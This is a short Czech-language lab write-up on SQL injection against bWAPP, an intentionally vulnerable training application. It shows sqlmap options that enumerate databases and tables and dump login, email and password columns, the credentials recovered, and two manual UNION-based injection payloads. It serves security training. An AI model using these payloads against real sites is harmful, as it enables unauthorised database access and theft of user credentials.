# SQLMAP
Otevřeme si provoz na klientovi pomocí pravého tlačítka -> inspect -> network a podíváme se na Cookie.

V Kali OS si pustíme terminál a použijeme tool sqlmap s následující syntaxí

Sqlmap nám vyhodí dostupne databáze.

Vybereme databázi bWAPP a její tabulky pomocí `-D bWAPP --tables`


Zobrazíme si tabulku users a její řádky pomocí `-T users --columns`



A vytáhneme si potřebné řádky, které chceme pomocí `-C login,email,password --dump`

Zde můžeme vidět uživatele a jejich hesla
A.I.M - bug
bee - bug
V zadání dále bylo "jak se jmenuje hrdina s ID č.4"

Vytáhneme si proto databázi bWAPP tabulku heroes a řádky id,login,password

Zjistíme, že na ID č.4 se nachází wolverine.
# Ruční SQL
`' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -`

`' and 1=0 union select id,login,secret,password,5,6,7 from heroes#`
